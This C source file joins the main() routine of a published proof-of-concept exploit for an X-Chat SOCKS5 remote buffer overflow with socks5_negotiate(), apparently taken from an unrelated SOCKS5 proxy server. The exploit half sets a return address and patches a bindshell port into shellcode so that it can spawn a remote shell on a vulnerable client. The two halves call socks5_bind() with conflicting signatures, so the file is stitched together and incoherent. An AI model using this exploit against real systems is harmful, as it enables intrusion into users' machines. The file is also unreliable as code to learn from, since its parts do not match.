/*
 * Entry point of the published proof-of-concept for the X-Chat SOCKS5
 * remote buffer overflow (the banner names versions 1.8.0 through 2.0.8).
 * Parses an offset and optional ports from argv, prints the chosen
 * parameters, then hands off to socks5_bind() and getshell(), both
 * defined elsewhere in the file and not visible here.
 *
 * Defensive reading: the harness acts as the proxy the client connects
 * to, so the exposure is an X-Chat build in the affected range pointed at
 * an untrusted SOCKS5 proxy; the X-Chat-side fix is in the client's
 * proxy reply handling, not in anything this program does locally.
 */
int main(int argc, char **argv)
{
	unsigned short port = DFLPORT, sport = DFLSPRT;	/* proxy listen port, bindshell port */
	unsigned int retaddr = BSEADDR;			/* base address, lowered by argv[1] */
	char *hostptr;

	/* BUFSIZE must fit a single byte; note the check lets 0 through although the message says 1-255 */
	if (BUFSIZE < 0 || BUFSIZE > 255)
		printe("BUFSIZE must be 1-255(char/int8).", 1);
	printf("[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp"
	    "loit.\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n\n");
	if (argc < 2) {
		printf("[!] syntax: %s <offset from 0x%.8x> [port] [shell port]\n\n",
		    argv[0], BSEADDR);
		exit(1);
	}
	/* atoi() reports no errors: non-numeric arguments silently become 0 */
	if (argc > 1)
		retaddr -= atoi(argv[1]);
	if (argc > 2)
		port = atoi(argv[2]);
	if (argc > 3)
		sport = atoi(argv[3]);
	/* x86_exec is a byte array defined elsewhere; bytes 20/21 receive sport, high byte first */
	x86_exec[20] = (sport & 0xff00) >> 8;
	x86_exec[21] = (sport & 0x00ff);
	printf("[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\n",
	    retaddr, port, sport);
	hostptr = socks5_bind(port, retaddr);	/* returns a host string consumed by getshell() */
	sleep(1);
	getshell(hostptr, sport);
	exit(0);
}
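/*
 * Perform the SOCKS5 handshake on an accepted client socket.
 *
 * The caller has already consumed the protocol version byte. This reads
 * the method list, answers "no authentication required", parses the
 * request header, resolves the destination (IPv4 literal or FQDN) into
 * a sockaddr_in, and dispatches CONNECT/BIND to the command-specific
 * routines.
 *
 * @param clisock  connected client descriptor
 * @param conn     connection descriptor forwarded to socks5_connect()
 * @return the result of socks5_connect()/socks5_bind(), or -1 on a short
 *         read/write, a version mismatch, an unsupported address type or
 *         command, an empty FQDN, or a resolver answer that is not a
 *         single-sized IPv4 address. UDP ASSOCIATE is not supported.
 */
int
socks5_negotiate(int clisock, struct conndesc *conn)
{
	u_int i;
	char hostname[256];		/* 255-byte FQDN maximum plus NUL */
	u_char nmethods, len, junk;
	struct sockaddr_in rem_in;
	struct socks5_req req5;
	struct socks5_v_repl rep5;
	struct hostent *hent;

	req5.vn = 5;
	req5.rsv = 0;

	/*
	 * Start by retrieving number of methods, version number has
	 * already been consumed by the calling procedure
	 */
	if (atomicio(read, clisock, &nmethods, 1) != 1) {
		warnv(1, "read()");
		return (-1);
	}

	/* Eat up methods: we do not evaluate them, just drain the bytes */
	for (i = 0; i < nmethods; i++) {
		if (atomicio(read, clisock, &junk, 1) != 1) {
			warnv(1, "read()");
			return (-1);
		}
	}

	/*
	 * We don't support any authentication methods yet, so simply
	 * ignore it and send reply with no authentication required.
	 */
	rep5.ver = 5;
	rep5.res = 0;
	if (atomicio(write, clisock, &rep5, 2) != 2) {
		warnv(1, "write()");
		return (-1);
	}

	/* Receive data up to atyp */
	if (atomicio(read, clisock, &req5, 4) != 4) {
		warnv(1, "read()");
		return (-1);
	}
	if (req5.vn != 5)
		return (-1);

	memset(&rem_in, 0, sizeof(rem_in));
	switch (req5.atyp) {
	case SOCKS5_ATYP_IPV4:
		if (atomicio(read, clisock, &req5.destaddr, 4) != 4) {
			warnv(1, "read()");
			return (-1);
		}
		rem_in.sin_family = AF_INET;
		rem_in.sin_addr.s_addr = req5.destaddr;
		break;
	case SOCKS5_ATYP_FQDN:
		if (atomicio(read, clisock, &len, 1) != 1) {
			warnv(1, "read()");
			return (-1);
		}
		/* An empty name is a protocol violation; reject it before resolving */
		if (len == 0)
			return (-1);
		/* len is a u_char (<= 255), so hostname[len] stays within the buffer */
		if (atomicio(read, clisock, hostname, len) != len) {
			warnv(1, "read()");
			return (-1);
		}
		hostname[len] = '\0';
		if ((hent = gethostbyname(hostname)) == NULL) {
			/* XXX no hstrerror() on solaris */
#ifndef __sun__
			warnxv(1, "gethostbyname(): %s", hstrerror(h_errno));
#endif /* __sun__ */
			return (-1);
		}
		/*
		 * Only an IPv4 answer fits a sockaddr_in. A resolver may
		 * hand back another family, a different address size or an
		 * empty list; an unchecked copy of h_addr would then read
		 * the wrong width or dereference NULL.
		 */
		if (hent->h_addrtype != AF_INET ||
		    hent->h_length != (int)sizeof(rem_in.sin_addr) ||
		    hent->h_addr_list[0] == NULL)
			return (-1);
		rem_in.sin_family = AF_INET;
		memcpy(&rem_in.sin_addr, hent->h_addr_list[0],
		    sizeof(rem_in.sin_addr));
		break;
	default:
		return (-1);
	}

	if (atomicio(read, clisock, &req5.destport, 2) != 2) {
		warnv(1, "read()");
		return (-1);
	}
	/* Port is stored exactly as read from the wire; no byte swap is applied */
	rem_in.sin_port = req5.destport;

	/*
	 * Now we have a filled in in_addr for the target host:
	 * target_in, no socket yet. This is provided by the command
	 * specific functions multiplexed in the next switch
	 * statement.
	 */
	switch (req5.cd) {
	case SOCKS5_CD_CONNECT:
		return (socks5_connect(clisock, &rem_in, &req5, conn));
	case SOCKS5_CD_BIND:
		signal_setup();
		event_dispatch();
		return (socks5_bind(clisock, &rem_in, &req5));
	case SOCKS5_CD_UDP_ASSOC:
	default:
		return (-1);
	}
}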